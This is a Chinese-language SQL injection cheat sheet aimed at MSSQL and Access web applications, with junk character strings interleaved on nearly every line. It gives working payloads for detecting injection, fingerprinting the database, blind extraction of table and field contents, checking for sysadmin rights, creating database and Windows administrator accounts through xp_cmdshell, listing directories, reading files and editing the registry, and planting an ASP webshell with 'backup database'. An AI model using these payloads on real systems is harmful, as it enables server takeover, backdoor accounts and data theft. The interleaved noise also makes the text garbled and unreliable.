1.判断是否有注入;and 1=1 ;and 1=2 f%c06Un=
2.初步判断是否是mssql ;and user>0 f2NA=%\
p~h4\.*`
3.注入参数是字符'and [查询条件] and ''=' t) LU\!
Q/p(#/y#b
4.搜索时没过滤参数的'and [查询条件] and '%25'=' IWQ&6SDW$z
Bb~5& @M|N
5.判断数据库系统 d+tj%7
0f1H8zV
;and (select count(*) from sysobjects)>0 mssql ASR-a't6
wTTRoeJ}
;and (select count(*) from msysobjects)>0 access 9hy'DcSy,
XM$GQn]B
;v_ls)_,-
*/nuv
k
6.猜数据库 ;and (select Count(*) from [数据库名])>0 dgXg kB'
s3seK6x'
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ! Q!&CG5l
V{!lk]p}a
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 Yt{ji
V"O9n[ |
9.(1)猜字段的ascii值(access) {gsW(T>)
zhX;6= X2
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 wS V@=)H\:
Vb2\/e:k
(2)猜字段的ascii值(mssql) QP:9%f>=
%l,4=TQ[m
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 M+0x;53nz
wazP,9W?
10.测试权限结构(mssql) pajy#0 U
G.Tpl-m
!3h{lEB
Je^Y&a~
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- *<r%aeG$em
4f!dYo4L
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- N+NK`
BhLZ7 *
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ^#;RLSv
//<:k8
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- p5-<P?B
`gI~|A4
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- &mcR
"qS!B.rt:
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 6}ftBmv
iT.|vr1HG
;and 1=(select IS_MEMBER('db_owner'));-- ^7Lk-a7gp
!Av1Leb9$
>yKpM }6l{
J?IC~5*2
11.添加mssql和系统的帐户 .a,(pq Jg
F$h'p4$T
;exec master.dbo.sp_addlogin username;-- ds]?;l"
;exec master.dbo.sp_password null,username,password;-- |<rfvsQ.
`E W!-v)
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- <1
S+'
_s*!
t
;exec master.dbo.xp_cmdshell 'net user username password VHW`NP 5Jl
"Hht
g:
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- V9T
4+
aM$=|%9/
;exec master.dbo.xp_cmdshell 'net user username password /add';-- K_>/lirE?
y@A6$[%(E|
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ^X&)'H
&dRjqn^&X
b66R}=P l
[/OQyb4F<
12.(1)遍历目录 ,]7XMU3
&2{]hRM
;create table dirs(paths varchar(100), id int) c|lU(Tf
#W|!fILL
;insert dirs exec master.dbo.xp_dirtree 'c:\' IBET'!j4"
WYLX?x
;and (select top 1 paths from dirs)>0 >)^NJ2Fd
<Y>3
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ,eXFN?CB
(@q3^)I4
)[jy[[K(
> rw"Rd'
(2)遍历目录 TV=c,*TV
K2HvI7$-
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ZoxS*Xk
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 X2^_~<I{,
6e#wR/
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 Cw#V`70a
Lm|al.Z
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 Vv4H:BK$
SA+d&H}Fc
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 _CE9B e\
&$#99\/
.S!-e$EJ
O>AFF@=
13.mssql中的存储过程 Pq?*C;D
v9rVpYc"
xp_regenumvalues 注册表根键, 子键 Q#pnj thM
y]'CXCml)
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 dIJGB==
Gw{+xz KJ
xp_regread 根键,子键,键值名 C3}Aq8$6
yp+F<5o
;exec xp_regread P}@*Z>j:#
a#y{pT2 b
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 dB3N%pB^
s}(X]Gx1
xp_regwrite 根键,子键, 值名, 值类型, 值 ~ziexZ=N
E>}q2
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 S+ebO/$>
kA^A mfba
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 a,n93-m(m
j Nc<~{/
xp_regdeletevalue 根键,子键,值名 GNU;jSh5
s;1e0n
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 z0Xa_w=
?3jdg ]&
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 HO5d%85
a$m_D!b~_
9m8ee&,
tU:FX[&?R
14.mssql的backup创建webshell Qq3fZ=
`6F+Rrn
use model k1fRj_@WPT
31}W6l88c
create table cmd(str image); UX_I6_&
WZ?!!
insert into cmd(str) values (''); +< KNY
L~eAQR
backup database model to disk='c:\l.asp'; S$O,] @)
^>m^\MuZ
uTGcQs}
@~o`#$*|
15.mssql内置函数 3eKQ<$w
}q'WC4.
;and (select @@version)>0 获得Windows的版本号 GuO`jz F
f1Zt?=
;and user_name()='dbo' 判断当前系统的连接用户是不是sa yd>}wHt
?/d!R]3
;and (select user_name())>0 爆当前系统的连接用户 wL2XNdo}<
D1Yh,P<CF\
;and (select db_name())>0 得到当前连接的数据库 ;+`uER
e<5Y94YE
<Tx C!{<
lLCdmxbT
16.简洁的webshell #T \
0M8.U
use model uRQ_'l
o:UXPAj
create table cmd(str image); `^##b6jH
te'*<HM
insert into cmd(str) values (''); |4Ha?W
C4NRDwU|.
backup database model to disk='g:\wwwtest\l.asp';